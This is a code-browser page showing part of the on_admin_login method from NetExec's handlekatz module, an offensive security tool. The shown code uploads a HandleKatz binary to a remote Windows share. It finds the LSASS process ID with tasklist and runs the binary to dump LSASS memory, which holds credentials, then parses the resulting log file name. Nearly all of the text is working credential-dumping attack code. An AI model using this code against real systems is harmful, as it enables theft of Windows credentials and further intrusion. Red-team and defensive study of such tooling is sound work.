MCPcopy
hub / github.com/Pennyw0rth/NetExec / on_admin_login

Method on_admin_login

nxc/modules/handlekatz.py:53–185  ·  view source on GitHub ↗
(self, context, connection)

Source from the content-addressed store, hash-verified

51 self.dir_result = module_options["DIR_RESULT"]
52
53 def on_admin_login(self, context, connection):
54 handlekatz_loc = self.handlekatz_path + self.handlekatz
55
56 if self.useembeded:
57 try:
58 with open(handlekatz_loc, "wb") as handlekatz:
59 handlekatz.write(self.handlekatz_embeded)
60 except FileNotFoundError:
61 context.log.fail(f"Handlekatz file specified '{handlekatz_loc}' does not exist!")
62 sys.exit(1)
63
64 context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}")
65
66 with open(handlekatz_loc, "rb") as handlekatz:
67 try:
68 connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
69 context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}")
70 except Exception as e:
71 context.log.fail(f"Error writing file to share {self.share}: {e}")
72
73 # get LSASS PID via `tasklist`
74 command = 'tasklist /v /fo csv | findstr /i "lsass"'
75 context.log.display(f"Getting lsass PID via command {command}")
76 p = connection.execute(command, True)
77 context.log.debug(f"Command Result: {p}")
78 if len(p) == 1:
79 p = p[0]
80
81 if not p or p == "None":
82 context.log.fail("Failed to execute command to get LSASS PID")
83 self.delete_handlekatz_binary(connection, context)
84 return
85 # we get a CSV string back from `tasklist`, so we grab the PID from it
86 pid = p.split(",")[1][1:-1]
87 context.log.debug(f"pid: {pid}")
88
89 command = self.tmp_dir + self.handlekatz + " --pid:" + pid + " --outfile:" + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log"
90 context.log.display(f"Executing command {command}")
91
92 p = connection.execute(command, True)
93 context.log.debug(f"Command result: {p}")
94
95 if "Lsass dump is complete" in p:
96 context.log.success("Process lsass.exe was successfully dumped")
97 dump = True
98 else:
99 context.log.fail("Process lsass.exe error un dump, try with verbose")
100 dump = False
101
102 if not dump:
103 self.delete_handlekatz_binary(connection, context)
104 return
105 else:
106 regex = r"([A-Za-z0-9-]*\.log)"
107 matches = re.search(regex, str(p), re.MULTILINE)
108 if not matches:
109 context.log.display("Error getting the lsass.dmp file name")
110 return

Callers

nothing calls this directly

Calls 10

add_user_bhFunction · 0.90
writeMethod · 0.80
failMethod · 0.80
displayMethod · 0.80
successMethod · 0.80
searchMethod · 0.80
executeMethod · 0.45
readMethod · 0.45
highlightMethod · 0.45

Tested by

no test coverage detected